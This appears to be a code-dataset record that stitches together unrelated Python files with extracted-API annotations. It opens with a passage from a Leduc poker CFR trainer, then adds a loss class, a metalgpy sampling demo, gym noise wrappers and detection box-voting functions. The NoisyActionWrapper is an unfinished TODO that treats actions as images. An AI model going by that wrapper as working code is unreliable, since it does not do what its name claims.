node = self.Get_information_set_node_or_create_it_if_nonexistant(infoSet)
node.Get_strategy_through_regret_matching()
if player == target_player_i:
util_list = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
nodeUtil = 0
for ai in node.possible_action:
nextHistory = history + self.ACTION_DICT[ai]
util_list[ai] = self.external_sampling_MCCFR(nextHistory, target_player_i)
nodeUtil += node.strategy[ai] * util_list[ai]
for ai in node.possible_action:
regret = util_list[ai] - nodeUtil
node.regretSum[ai] += regret
else:
sampling_action = np.random.choice(list(range(self.NUM_ACTIONS)), p= node.strategy)
nextHistory = history + self.ACTION_DICT[sampling_action]
nodeUtil= self.external_sampling_MCCFR(nextHistory, target_player_i)
for ai in node.possible_action:
node.strategySum[ai] += node.strategy[ai]
return nodeUtil
#outcome sampling MCCFR
def outcome_sampling_MCCFR(self, history, target_player_i, iteration_t, p_list,s):
if self.card_num_check(history) == self.NUM_PLAYERS + 1:
private_cards, history_before, community_card, history_after = self.Split_history(history)
player = self.action_player(history)
if self.whether_terminal_states(history):
return self.Return_payoff_for_terminal_states(history, target_player_i) / s, 1
elif self.whether_chance_node(history):
if len(history) == 0:
self.cards = self.card_distribution()
random.shuffle(self.cards)
nextHistory = "".join(self.cards[:self.NUM_PLAYERS])
return self.outcome_sampling_MCCFR(nextHistory, target_player_i, iteration_t, p_list, s)
else:
nextHistory = history + self.cards[self.NUM_PLAYERS]
return self.outcome_sampling_MCCFR(nextHistory, target_player_i, iteration_t, p_list, s)
infoSet = history[player] + history[self.NUM_PLAYERS:]
node = self.Get_information_set_node_or_create_it_if_nonexistant(infoSet)
node.Get_strategy_through_regret_matching()
probability = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
if player == target_player_i:
for ai in node.possible_action:
probability[ai] = self.epsilon/len(node.possible_action)+ (1-self.epsilon)* node.strategy[ai]
else:
for ai in node.possible_action:
probability[ai] = node.strategy[ai]
sampling_action = np.random.choice(list(range(self.NUM_ACTIONS)), p=probability)
nextHistory = history + self.ACTION_DICT[sampling_action]
if player == target_player_i:
p_change = np.array([1 for _ in range(self.NUM_PLAYERS)], dtype=float)
p_change[player] = node.strategy[sampling_action]
util, p_tail = self.outcome_sampling_MCCFR(nextHistory, target_player_i, iteration_t, p_list*p_change, s*probability[sampling_action])
p_exclude = 1
for idx in range(self.NUM_PLAYERS):
if idx != player:
p_exclude *= p_list[idx]
w = util * p_exclude
for ai in node.possible_action:
if sampling_action == ai:
regret = w*(1- node.strategy[sampling_action])*p_tail
else:
regret = -w*p_tail * node.strategy[sampling_action]
node.regretSum[ai] += regret
else:
p_change = np.array([1 for _ in range(self.NUM_PLAYERS)], dtype=float)
for idx in range(self.NUM_PLAYERS):
if idx!= player:
p_change[idx] = node.strategy[sampling_action]
util, p_tail = self.outcome_sampling_MCCFR(nextHistory, target_player_i, iteration_t, p_list*p_change, s*probability[sampling_action])
p_exclude = 1
for idx in range(self.NUM_PLAYERS):
if idx != player:
p_exclude *= p_list[idx]
for ai in node.possible_action:
node.strategySum[ai] += (iteration_t - node.c)*p_exclude*node.strategy[ai]
node.c = iteration_t
#node.strategySum[ai] += (p1/s)*node.strategy[ai]
return util, p_tail*node.strategy[sampling_action]
#KuhnTrainer main method
def train(self, method):
self.exploitability_list = {}
for iteration_t in tqdm(range(int(self.train_iterations))):
for target_player_i in range(self.NUM_PLAYERS):
p_list = np.array([1 for _ in range(self.NUM_PLAYERS)], dtype=float)
if method == "vanilla_CFR":
self.vanilla_CFR("", target_player_i, iteration_t, p_list)
elif method == "chance_sampling_CFR":
self.chance_sampling_CFR("", target_player_i, iteration_t, p_list)
elif method == "external_sampling_MCCFR":
self.external_sampling_MCCFR("", target_player_i)
elif method == "outcome_sampling_MCCFR":
self.epsilon = 0.6
self.outcome_sampling_MCCFR("", target_player_i, iteration_t, p_list, 1)
#calculate expolitability
if iteration_t in [int(j)-1 for j in np.logspace(1, len(str(self.train_iterations))-1, (len(str(self.train_iterations))-1)*3)] :
self.exploitability_list[iteration_t] = self.get_exploitability_dfs()
if wandb_save:
wandb.log({'iteration': iteration_t, 'exploitability': self.exploitability_list[iteration_t]})
self.show_plot(method)
def show_plot(self, method):
plt.scatter(list(self.exploitability_list.keys()), list(self.exploitability_list.values()), label=method)
plt.plot(list(self.exploitability_list.keys()), list(self.exploitability_list.values()))
plt.xscale('log')
plt.yscale('log')
plt.xlabel("iterations")
plt.ylabel("exploitability")
plt.legend(loc = "lower left")
if wandb_save:
wandb.save()
# evaluate average strategy
def eval_strategy(self, target_player_i):
self.eval = True
p_list = np.array([1 for _ in range(self.NUM_PLAYERS)], dtype=float)
average_utility = self.vanilla_CFR("", target_player_i, 0, p_list)
self.eval = False
return average_utility
def calc_best_response_value(self, best_response_strategy, best_response_player, history, prob):
if self.card_num_check(history) == self.NUM_PLAYERS + 1:
private_cards, history_before, community_card, history_after = self.Split_history(history)
player = self.action_player(history)
if self.whether_terminal_states(history):
return self.Return_payoff_for_terminal_states(history, best_response_player)
elif self.whether_chance_node(history):
if len(history) == 0:
cards = self.card_distribution()
cards_candicates = [cards_candicate for cards_candicate in itertools.permutations(cards, self.NUM_PLAYERS)]
utility_sum = 0
for cards_i in cards_candicates:
nextHistory = "".join(cards_i[:self.NUM_PLAYERS])
utility = (1/len(cards_candicates))* self.calc_best_response_value(best_response_strategy, best_response_player, nextHistory, prob)
utility_sum += utility
return utility_sum
else:
com_cards = self.card_distribution()
com_cards.remove(history[0])
com_cards.remove(history[1])
utility_sum_round2 = 0
for com_cards_i in com_cards:
nextHistory = history + com_cards_i
utility_sum_round2 += (1/len(com_cards))*self.calc_best_response_value(best_response_strategy, best_response_player, nextHistory, prob)
return utility_sum_round2
infoSet = history[player] + history[self.NUM_PLAYERS:]
node = self.Get_information_set_node_or_create_it_if_nonexistant(infoSet)
if player == best_response_player:
if infoSet not in best_response_strategy:
action_value = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
br_value = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
for assume_history, po_ in self.infoSets_dict[infoSet].items():
for ai in node.possible_action:
nextHistory = assume_history + self.ACTION_DICT[ai]
br_value[ai] = self.calc_best_response_value(best_response_strategy, best_response_player, nextHistory, po_)
action_value[ai] += br_value[ai] * po_
          # br_action = 0 would be wrong here: action 0 (fold) is not available at every node, so start from the first legal action
br_action = node.possible_action[0]
for ai in node.possible_action:
if action_value[ai] > action_value[br_action]:
br_action = ai
best_response_strategy[infoSet] = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
best_response_strategy[infoSet][br_action] = 1.0
node_util = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
for ai in node.possible_action:
nextHistory = history + self.ACTION_DICT[ai]
node_util[ai] = self.calc_best_response_value(best_response_strategy, best_response_player, nextHistory, prob)
best_response_util = 0
for ai in node.possible_action:
best_response_util += node_util[ai] * best_response_strategy[infoSet][ai]
return best_response_util
else:
avg_strategy = node.Get_average_information_set_mixed_strategy()
nodeUtil = 0
action_value_list = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
for ai in node.possible_action:
nextHistory = history + self.ACTION_DICT[ai]
action_value_list[ai] = self.calc_best_response_value(best_response_strategy, best_response_player, nextHistory, prob*avg_strategy[ai])
nodeUtil += avg_strategy[ai] * action_value_list[ai]
return nodeUtil
def create_infoSets(self, history, target_player, po):
player = self.action_player(history)
if self.whether_terminal_states(history):
return
elif self.whether_chance_node(history):
#round1
if len(history) == 0:
cards = self.card_distribution()
cards_candicates = [cards_candicate for cards_candicate in itertools.permutations(cards, self.NUM_PLAYERS)]
for cards_candicates_i in cards_candicates:
nextHistory = "".join(cards_candicates_i[:self.NUM_PLAYERS])
self.create_infoSets(nextHistory, target_player, po*(1/len(cards_candicates)))
return
#round2
else:
com_cards_candicates = self.card_distribution()
for player_i in range(self.NUM_PLAYERS):
com_cards_candicates.remove(history[player_i])
for com_cards_i in com_cards_candicates:
nextHistory = history + com_cards_i
self.create_infoSets(nextHistory, target_player, po*(1/len(com_cards_candicates)))
return
infoSet = history[player] + history[self.NUM_PLAYERS:]
if player == target_player:
if self.infoSets_dict.get(infoSet) is None:
self.infoSets_dict[infoSet] = defaultdict(int)
self.infoSets_dict[infoSet][history] += po
node = self.Get_information_set_node_or_create_it_if_nonexistant(infoSet)
for ai in node.possible_action:
nextHistory = history + self.ACTION_DICT[ai]
if player == target_player:
self.create_infoSets(nextHistory, target_player, po)
else:
actionProb = node.Get_average_information_set_mixed_strategy()[ai]
self.create_infoSets(nextHistory, target_player, po*actionProb)
def get_exploitability_dfs(self):
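    # (added note) exploitability here is the sum over players of the value a best
    # response earns against the current average strategy; it is non-negative and
    # approaches 0 as the profile approaches a Nash equilibrium.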
    # build every information set & compute its reach probability
self.infoSets_dict = {}
for target_player in range(self.NUM_PLAYERS):
self.create_infoSets("", target_player, 1.0)
exploitability = 0
best_response_strategy = {}
for best_response_player_i in range(self.NUM_PLAYERS):
exploitability += self.calc_best_response_value(best_response_strategy, best_response_player_i, "", 1)
assert exploitability >= 0
return exploitability
#config
algorithm_candicates = ["vanilla_CFR", "chance_sampling_CFR", "external_sampling_MCCFR", "outcome_sampling_MCCFR"]
algo = algorithm_candicates[1]
train_iterations = 10**5
num_players = 2
wandb_save = True
if wandb_save:
wandb.init(project="Leduc_Poker_{}players".format(num_players), name="cfr_{}".format(algo))
#train
leduc_trainer = LeducTrainer(train_iterations=train_iterations, num_players=num_players)
leduc_trainer.train(algo)
print("avg util:", leduc_trainer.eval_strategy(0))
pd.set_option('display.max_rows', None)
result_dict = {}
for key, value in sorted(leduc_trainer.nodeMap.items()):
result_dict[key] = value.Get_average_information_set_mixed_strategy()
df = pd.DataFrame(result_dict.values(), index=result_dict.keys(), columns=["Fold", "Call", "Raise"])
df.index.name = "Node"
print(df)
# calculate random strategy_profile exploitability
for i in range(2,3):
kuhn_poker_agent = LeducTrainer(train_iterations=0, num_players=i)
print("{}player game:".format(i), kuhn_poker_agent.get_exploitability_dfs())
doctest.testmod()
|
[
"matplotlib.pyplot.xscale",
"wandb.log",
"matplotlib.pyplot.yscale",
"random.shuffle",
"matplotlib.pyplot.legend",
"itertools.permutations",
"collections.defaultdict",
"numpy.array",
"wandb.save",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"pandas.set_option",
"doctest.testmod"
] |
[((32412, 32451), 'pandas.set_option', 'pd.set_option', (['"""display.max_rows"""', 'None'], {}), "('display.max_rows', None)\n", (32425, 32451), True, 'import pandas as pd\n'), ((32957, 32974), 'doctest.testmod', 'doctest.testmod', ([], {}), '()\n', (32972, 32974), False, 'import doctest\n'), ((3162, 3179), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (3173, 3179), False, 'from collections import defaultdict\n'), ((25608, 25625), 'matplotlib.pyplot.xscale', 'plt.xscale', (['"""log"""'], {}), "('log')\n", (25618, 25625), True, 'import matplotlib.pyplot as plt\n'), ((25630, 25647), 'matplotlib.pyplot.yscale', 'plt.yscale', (['"""log"""'], {}), "('log')\n", (25640, 25647), True, 'import matplotlib.pyplot as plt\n'), ((25652, 25676), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""iterations"""'], {}), "('iterations')\n", (25662, 25676), True, 'import matplotlib.pyplot as plt\n'), ((25681, 25709), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""exploitability"""'], {}), "('exploitability')\n", (25691, 25709), True, 'import matplotlib.pyplot as plt\n'), ((25714, 25742), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""lower left"""'}), "(loc='lower left')\n", (25724, 25742), True, 'import matplotlib.pyplot as plt\n'), ((1690, 1717), 'numpy.array', 'np.array', (['[1, 2]'], {'dtype': 'int'}), '([1, 2], dtype=int)\n', (1698, 1717), True, 'import numpy as np\n'), ((25770, 25782), 'wandb.save', 'wandb.save', ([], {}), '()\n', (25780, 25782), False, 'import wandb\n'), ((1782, 1812), 'numpy.array', 'np.array', (['[0, 1, 2]'], {'dtype': 'int'}), '([0, 1, 2], dtype=int)\n', (1790, 1812), True, 'import numpy as np\n'), ((30920, 30936), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (30931, 30936), False, 'from collections import defaultdict\n'), ((1876, 1903), 'numpy.array', 'np.array', (['[0, 1]'], {'dtype': 'int'}), '([0, 1], dtype=int)\n', (1884, 1903), True, 'import numpy as np\n'), ((15494, 15520), 'random.shuffle', 'random.shuffle', (['self.cards'], {}), '(self.cards)\n', (15508, 15520), False, 'import random\n'), ((19712, 19738), 'random.shuffle', 'random.shuffle', (['self.cards'], {}), '(self.cards)\n', (19726, 19738), False, 'import random\n'), ((21644, 21670), 'random.shuffle', 'random.shuffle', (['self.cards'], {}), '(self.cards)\n', (21658, 21670), False, 'import random\n'), ((25244, 25343), 'wandb.log', 'wandb.log', (["{'iteration': iteration_t, 'exploitability': self.exploitability_list[\n iteration_t]}"], {}), "({'iteration': iteration_t, 'exploitability': self.\n exploitability_list[iteration_t]})\n", (25253, 25343), False, 'import wandb\n'), ((17475, 17526), 'itertools.permutations', 'itertools.permutations', (['cards', '(self.NUM_PLAYERS + 1)'], {}), '(cards, self.NUM_PLAYERS + 1)\n', (17497, 17526), False, 'import itertools\n'), ((26703, 26750), 'itertools.permutations', 'itertools.permutations', (['cards', 'self.NUM_PLAYERS'], {}), '(cards, self.NUM_PLAYERS)\n', (26725, 26750), False, 'import itertools\n'), ((30070, 30117), 'itertools.permutations', 'itertools.permutations', (['cards', 'self.NUM_PLAYERS'], {}), '(cards, self.NUM_PLAYERS)\n', (30092, 30117), False, 'import itertools\n')]
|
import numpy as np
class LossFunction:
@staticmethod
def calculate_cost(expected_value, predicted):
raise NotImplementedError("Should have implemented this!")
@staticmethod
def calculate_cost_gradient(expected_value, outputs, derivative_outputs):
raise NotImplementedError("Should have implemented this!")
class MeanSquaredError(LossFunction):
@staticmethod
def calculate_cost(expected_value, outputs):
return 0.5 * np.power(np.linalg.norm(expected_value - outputs), 2)
@staticmethod
def calculate_cost_gradient(expected_value, outputs, derivative_outputs):
return (outputs - expected_value) * derivative_outputs
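# Hedged usage sketch (added; not part of the original file): a tiny check of the
# cost and its gradient, using an identity activation (derivative 1 everywhere).
if __name__ == "__main__":
    expected = np.array([1.0, 0.0])
    outputs = np.array([0.8, 0.2])
    print(MeanSquaredError.calculate_cost(expected, outputs))  # 0.5 * ||e - o||^2 = 0.04
    print(MeanSquaredError.calculate_cost_gradient(expected, outputs, np.ones(2)))  # [-0.2  0.2]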
|
[
"numpy.linalg.norm"
] |
[((478, 518), 'numpy.linalg.norm', 'np.linalg.norm', (['(expected_value - outputs)'], {}), '(expected_value - outputs)\n', (492, 518), True, 'import numpy as np\n')]
|
from dataclasses import dataclass
@dataclass
class Pool:
param1: int
@dataclass
class HEPnOS:
pools: list
# metalgpy
import numpy as np
import metalgpy as mpy
rng = np.random.RandomState(42)
Pool_ = mpy.meta(Pool)
HEPnOS_ = mpy.meta(HEPnOS)
max_pools = 5
num_pools = mpy.Int(1, max_pools)
pools = mpy.List([Pool_(param1=mpy.Int(0, 10)) for i in range(max_pools)], k=num_pools, invariant=True, name="pools")
hepnos_app = HEPnOS_(pools)
for sample_values, sample_app in mpy.sample(hepnos_app, size=2, rng=rng, deepcopy=True):
instance = sample_app.evaluate()
print(f"Frozen Program: {sample_app}")
print(f"Program evaluation: {instance}")
print()
|
[
"metalgpy.Int",
"metalgpy.sample",
"numpy.random.RandomState",
"metalgpy.meta"
] |
[((179, 204), 'numpy.random.RandomState', 'np.random.RandomState', (['(42)'], {}), '(42)\n', (200, 204), True, 'import numpy as np\n'), ((214, 228), 'metalgpy.meta', 'mpy.meta', (['Pool'], {}), '(Pool)\n', (222, 228), True, 'import metalgpy as mpy\n'), ((239, 255), 'metalgpy.meta', 'mpy.meta', (['HEPnOS'], {}), '(HEPnOS)\n', (247, 255), True, 'import metalgpy as mpy\n'), ((284, 305), 'metalgpy.Int', 'mpy.Int', (['(1)', 'max_pools'], {}), '(1, max_pools)\n', (291, 305), True, 'import metalgpy as mpy\n'), ((486, 540), 'metalgpy.sample', 'mpy.sample', (['hepnos_app'], {'size': '(2)', 'rng': 'rng', 'deepcopy': '(True)'}), '(hepnos_app, size=2, rng=rng, deepcopy=True)\n', (496, 540), True, 'import metalgpy as mpy\n'), ((337, 351), 'metalgpy.Int', 'mpy.Int', (['(0)', '(10)'], {}), '(0, 10)\n', (344, 351), True, 'import metalgpy as mpy\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = "<NAME>"
import gym
import numpy
from gym.spaces.box import Box
__all__ = ["NoisyObservationWrapper", "NoisyActionWrapper"]
class NoisyObservationWrapper(gym.ObservationWrapper):
"""Make observation dynamic by adding noise"""
def __init__(self, env: gym.Env = None, percent_pad=5, bottom_margin: int = 20):
"""
# doom 20px bottom is useless
:param env:
:param percent_pad:
:param bottom_margin:"""
super().__init__(env)
        self.original_shape = env.observation_space.shape
new_side = int(round(max(self.original_shape[:-1]) * 100.0 / (100.0 - percent_pad)))
self.new_shape = [new_side, new_side, 3]
self.observation_space = Box(0.0, 255.0, self.new_shape)
self.bottom_margin = bottom_margin
self.ob = None
def _observation(self, obs: numpy.ndarray) -> numpy.ndarray:
im_noise = numpy.random.randint(0, 256, self.new_shape).astype(obs.dtype)
im_noise[: self.original_shape[0] - self.bottom_margin, : self.original_shape[1], :] = obs[
: -self.bottom_margin, :, :
]
self.ob = im_noise
return im_noise
# def render(self, mode='human', close=False):
# temp = self.env.render(mode, close)
# return self.ob
class NoisyActionWrapper(gym.ActionWrapper):
"""
TODO: finish
Make action dynamic by adding noise"""
def __init__(self, env: gym.Env = None, percent_pad=5, bottom_margin: int = 20):
super().__init__(env)
        self.original_shape = env.observation_space.shape
new_side = int(round(max(self.original_shape[:-1]) * 100.0 / (100.0 - percent_pad)))
self.new_shape = [new_side, new_side, 3]
self.action_space = Box(0.0, 255.0, self.new_shape)
self.bottom_margin = bottom_margin
self.ob = None
def _action(self, obs: numpy.ndarray) -> numpy.ndarray:
im_noise = numpy.random.randint(0, 256, self.new_shape).astype(obs.dtype)
im_noise[: self.original_shape[0] - self.bottom_margin, : self.original_shape[1], :] = obs[
: -self.bottom_margin, :, :
]
self.ob = im_noise
return im_noise
# def render(self, mode='human', close=False):
# temp = self.env.render(mode, close)
# return self.ob
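# Hedged usage sketch (added; not part of the original file). "VizdoomBasic-v0" is a
# placeholder id: any env whose observations are (H, W, 3) images would work, since
# the wrapper only pads the frame to a square and fills the border with pixel noise.
# if __name__ == "__main__":
#     env = NoisyObservationWrapper(gym.make("VizdoomBasic-v0"), percent_pad=5)
#     print(env.observation_space.shape)  # padded square frame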
|
[
"gym.spaces.box.Box",
"numpy.random.randint"
] |
[((763, 794), 'gym.spaces.box.Box', 'Box', (['(0.0)', '(255.0)', 'self.new_shape'], {}), '(0.0, 255.0, self.new_shape)\n', (766, 794), False, 'from gym.spaces.box import Box\n'), ((1780, 1811), 'gym.spaces.box.Box', 'Box', (['(0.0)', '(255.0)', 'self.new_shape'], {}), '(0.0, 255.0, self.new_shape)\n', (1783, 1811), False, 'from gym.spaces.box import Box\n'), ((946, 990), 'numpy.random.randint', 'numpy.random.randint', (['(0)', '(256)', 'self.new_shape'], {}), '(0, 256, self.new_shape)\n', (966, 990), False, 'import numpy\n'), ((1958, 2002), 'numpy.random.randint', 'numpy.random.randint', (['(0)', '(256)', 'self.new_shape'], {}), '(0, 256, self.new_shape)\n', (1978, 2002), False, 'import numpy\n')]
|
import numpy as np
DEBUG = True
def py_box_voting_wrapper(IOU_thresh, score_thresh, with_nms):
if with_nms:
def _box_voting(nms_dets, dets):
return box_voting_nms(nms_dets, dets, IOU_thresh, score_thresh)
else:
def _box_voting(dets):
return box_voting(dets, IOU_thresh, score_thresh)
return _box_voting
def box_voting_nms(nms_dets, dets, IOU_thresh, score_thresh):
"""
greedily select boxes with high confidence and overlap with current maximum
and voting the final box coordinates by fusing those boxes
    :param nms_dets: dets after nms
:param dets: original detection results, dets before nms. [[x1, y1, x2, y2 score]]
:param IOU_thresh: retain overlap > IOU_thresh for fusion
:param score_thresh: retain score > score_thresh for fusion
:return: detection coordinates to keep
"""
x1 = dets[:, 0]
y1 = dets[:, 1]
x2 = dets[:, 2]
y2 = dets[:, 3]
scores = dets[:, 4]
areas = (x2 - x1 + 1) * (y2 - y1 + 1)
order = scores.argsort()[::-1]
if DEBUG:
print("dets ordered:", dets[order])
keep_fusion_boxes = []
for idx, nms_det in enumerate(nms_dets):
area_nms_det = (nms_det[2] - nms_det[0] + 1) * (nms_det[3] - nms_det[1] + 1)
xx1 = np.maximum(nms_det[0], x1[order])
yy1 = np.maximum(nms_det[1], y1[order])
xx2 = np.minimum(nms_det[2], x2[order])
yy2 = np.minimum(nms_det[3], y2[order])
# compute overlap
w = np.maximum(0.0, xx2 - xx1 + 1)
h = np.maximum(0.0, yy2 - yy1 + 1)
inter = w * h
ovr = inter / (area_nms_det + areas[order] - inter)
# retain boxes with large overlap and high confidence for fusion
IOU_inds_keep = np.where(ovr > IOU_thresh)[0]
scores_inds_keep = np.where(scores[order] > score_thresh)[0]
if DEBUG:
print("IOU_inds_keep:", IOU_inds_keep)
print("scores_inds_keep:", scores_inds_keep)
inds_fusion = np.intersect1d(IOU_inds_keep, scores_inds_keep)
if inds_fusion.size == 0: # if no box retained, keep the original one
keep_fusion_boxes.append(nms_det)
if DEBUG:
print("inds_fusion:", inds_fusion)
print("keep nms_det")
continue
if DEBUG:
if inds_fusion.size>1:
print("boxes for fusion:", inds_fusion)
print(dets[order[inds_fusion]])
x1_fusion = x1[order[inds_fusion]]
y1_fusion = y1[order[inds_fusion]]
x2_fusion = x2[order[inds_fusion]]
y2_fusion = y2[order[inds_fusion]]
scores_fusion = scores[order[inds_fusion]]
fusion_box = np.zeros((5))
fusion_box[0] = np.sum(x1_fusion * scores_fusion) / np.sum(scores_fusion)
fusion_box[1] = np.sum(y1_fusion * scores_fusion) / np.sum(scores_fusion)
fusion_box[2] = np.sum(x2_fusion * scores_fusion) / np.sum(scores_fusion)
fusion_box[3] = np.sum(y2_fusion * scores_fusion) / np.sum(scores_fusion)
fusion_box[4] = scores_fusion[0]
if DEBUG:
print("fusion_box:", fusion_box)
keep_fusion_boxes.append(fusion_box)
# boxes with small overlap are kept for another loop
inds_next = np.where(ovr <= IOU_thresh)[0]
order = order[inds_next]
keep_fusion_boxes = np.array(keep_fusion_boxes)
return keep_fusion_boxes
def box_voting(dets, IOU_thresh, score_thresh):
"""
greedily select boxes with high confidence and overlap with current maximum
and voting the final box coordinates by fusing those boxes
:param dets: original detection results, dets before nms. [[x1, y1, x2, y2 score]]
:param IOU_thresh: retain overlap > IOU_thresh for fusion
:param score_thresh: retain score > score_thresh for fusion
:return: detection coordinates to keep
"""
x1 = dets[:, 0]
y1 = dets[:, 1]
x2 = dets[:, 2]
y2 = dets[:, 3]
scores = dets[:, 4]
areas = (x2 - x1 + 1) * (y2 - y1 + 1)
order = scores.argsort()[::-1]
if DEBUG:
print("dets ordered:", dets)
keep_fusion_boxes = []
while order.size > 0:
i = order[0]
xx1 = np.maximum(x1[i], x1[order])
yy1 = np.maximum(y1[i], y1[order])
xx2 = np.minimum(x2[i], x2[order])
yy2 = np.minimum(y2[i], y2[order])
# compute overlap
w = np.maximum(0.0, xx2 - xx1 + 1)
h = np.maximum(0.0, yy2 - yy1 + 1)
inter = w * h
ovr = inter / (areas[i]+ areas[order] - inter)
# retain boxes with large overlap and high confidence for fusion
IOU_inds_keep = np.where(ovr > IOU_thresh)[0]
scores_inds_keep = np.where(scores[order] > score_thresh)[0]
if DEBUG:
print("IOU_inds_keep:", IOU_inds_keep)
print("scores_inds_keep:", scores_inds_keep)
        if IOU_inds_keep.size == 0 or scores_inds_keep.size == 0: # if no box retained, keep the original one
            keep_fusion_boxes.append(dets[i:i + 1])  # keep shape (1, 5) to match the fused boxes
            if DEBUG:
                print("keep original det")
            # shrink `order` before continuing, otherwise this loop never terminates
            order = order[np.where(ovr <= IOU_thresh)[0]]
            continue
inds_fusion = np.intersect1d(IOU_inds_keep, scores_inds_keep)
if DEBUG:
if inds_fusion.size>1:
print("boxes for fusion:", inds_fusion)
print(dets[order[inds_fusion]])
x1_fusion = x1[order[inds_fusion]]
y1_fusion = y1[order[inds_fusion]]
x2_fusion = x2[order[inds_fusion]]
y2_fusion = y2[order[inds_fusion]]
scores_fusion = scores[order[inds_fusion]]
fusion_box = np.zeros((1,5))
fusion_box[0][0] = np.sum(x1_fusion * scores_fusion) / np.sum(scores_fusion)
fusion_box[0][1] = np.sum(y1_fusion * scores_fusion) / np.sum(scores_fusion)
fusion_box[0][2] = np.sum(x2_fusion * scores_fusion) / np.sum(scores_fusion)
fusion_box[0][3] = np.sum(y2_fusion * scores_fusion) / np.sum(scores_fusion)
fusion_box[0][4] = scores_fusion[0]
if DEBUG:
print("fusion_box:", fusion_box)
keep_fusion_boxes.append(fusion_box)
# boxes with small overlap are kept for another loop
inds_next = np.where(ovr <= IOU_thresh)[0]
order = order[inds_next]
keep_fusion_boxes = np.array(keep_fusion_boxes)
return keep_fusion_boxes
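# --- Editor's usage sketch (illustrative values; not part of the original file) ---
# Assumes the module-level DEBUG flag used by both functions above is defined elsewhere in
# the original source; here it is set explicitly. Detections are [x1, y1, x2, y2, score].
if __name__ == "__main__":
    DEBUG = False  # hypothetical: silence the debug prints above
    dets = np.array([
        [10, 10, 50, 50, 0.90],
        [12, 12, 52, 53, 0.80],      # strongly overlaps the first box -> fused with it
        [100, 100, 150, 160, 0.70],  # isolated box -> kept as its own vote
    ])
    voted = box_voting(dets, IOU_thresh=0.5, score_thresh=0.1)
    print(voted)  # one score-weighted fusion of the first two boxes, plus the third box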
|
[
"numpy.minimum",
"numpy.maximum",
"numpy.sum",
"numpy.zeros",
"numpy.where",
"numpy.array",
"numpy.intersect1d"
] |
[((3374, 3401), 'numpy.array', 'np.array', (['keep_fusion_boxes'], {}), '(keep_fusion_boxes)\n', (3382, 3401), True, 'import numpy as np\n'), ((6324, 6351), 'numpy.array', 'np.array', (['keep_fusion_boxes'], {}), '(keep_fusion_boxes)\n', (6332, 6351), True, 'import numpy as np\n'), ((1285, 1318), 'numpy.maximum', 'np.maximum', (['nms_det[0]', 'x1[order]'], {}), '(nms_det[0], x1[order])\n', (1295, 1318), True, 'import numpy as np\n'), ((1333, 1366), 'numpy.maximum', 'np.maximum', (['nms_det[1]', 'y1[order]'], {}), '(nms_det[1], y1[order])\n', (1343, 1366), True, 'import numpy as np\n'), ((1381, 1414), 'numpy.minimum', 'np.minimum', (['nms_det[2]', 'x2[order]'], {}), '(nms_det[2], x2[order])\n', (1391, 1414), True, 'import numpy as np\n'), ((1429, 1462), 'numpy.minimum', 'np.minimum', (['nms_det[3]', 'y2[order]'], {}), '(nms_det[3], y2[order])\n', (1439, 1462), True, 'import numpy as np\n'), ((1502, 1532), 'numpy.maximum', 'np.maximum', (['(0.0)', '(xx2 - xx1 + 1)'], {}), '(0.0, xx2 - xx1 + 1)\n', (1512, 1532), True, 'import numpy as np\n'), ((1545, 1575), 'numpy.maximum', 'np.maximum', (['(0.0)', '(yy2 - yy1 + 1)'], {}), '(0.0, yy2 - yy1 + 1)\n', (1555, 1575), True, 'import numpy as np\n'), ((2004, 2051), 'numpy.intersect1d', 'np.intersect1d', (['IOU_inds_keep', 'scores_inds_keep'], {}), '(IOU_inds_keep, scores_inds_keep)\n', (2018, 2051), True, 'import numpy as np\n'), ((2711, 2722), 'numpy.zeros', 'np.zeros', (['(5)'], {}), '(5)\n', (2719, 2722), True, 'import numpy as np\n'), ((4257, 4285), 'numpy.maximum', 'np.maximum', (['x1[i]', 'x1[order]'], {}), '(x1[i], x1[order])\n', (4267, 4285), True, 'import numpy as np\n'), ((4300, 4328), 'numpy.maximum', 'np.maximum', (['y1[i]', 'y1[order]'], {}), '(y1[i], y1[order])\n', (4310, 4328), True, 'import numpy as np\n'), ((4343, 4371), 'numpy.minimum', 'np.minimum', (['x2[i]', 'x2[order]'], {}), '(x2[i], x2[order])\n', (4353, 4371), True, 'import numpy as np\n'), ((4386, 4414), 'numpy.minimum', 'np.minimum', (['y2[i]', 'y2[order]'], {}), '(y2[i], y2[order])\n', (4396, 4414), True, 'import numpy as np\n'), ((4454, 4484), 'numpy.maximum', 'np.maximum', (['(0.0)', '(xx2 - xx1 + 1)'], {}), '(0.0, xx2 - xx1 + 1)\n', (4464, 4484), True, 'import numpy as np\n'), ((4497, 4527), 'numpy.maximum', 'np.maximum', (['(0.0)', '(yy2 - yy1 + 1)'], {}), '(0.0, yy2 - yy1 + 1)\n', (4507, 4527), True, 'import numpy as np\n'), ((5194, 5241), 'numpy.intersect1d', 'np.intersect1d', (['IOU_inds_keep', 'scores_inds_keep'], {}), '(IOU_inds_keep, scores_inds_keep)\n', (5208, 5241), True, 'import numpy as np\n'), ((5644, 5660), 'numpy.zeros', 'np.zeros', (['(1, 5)'], {}), '((1, 5))\n', (5652, 5660), True, 'import numpy as np\n'), ((1756, 1782), 'numpy.where', 'np.where', (['(ovr > IOU_thresh)'], {}), '(ovr > IOU_thresh)\n', (1764, 1782), True, 'import numpy as np\n'), ((1813, 1851), 'numpy.where', 'np.where', (['(scores[order] > score_thresh)'], {}), '(scores[order] > score_thresh)\n', (1821, 1851), True, 'import numpy as np\n'), ((2749, 2782), 'numpy.sum', 'np.sum', (['(x1_fusion * scores_fusion)'], {}), '(x1_fusion * scores_fusion)\n', (2755, 2782), True, 'import numpy as np\n'), ((2785, 2806), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (2791, 2806), True, 'import numpy as 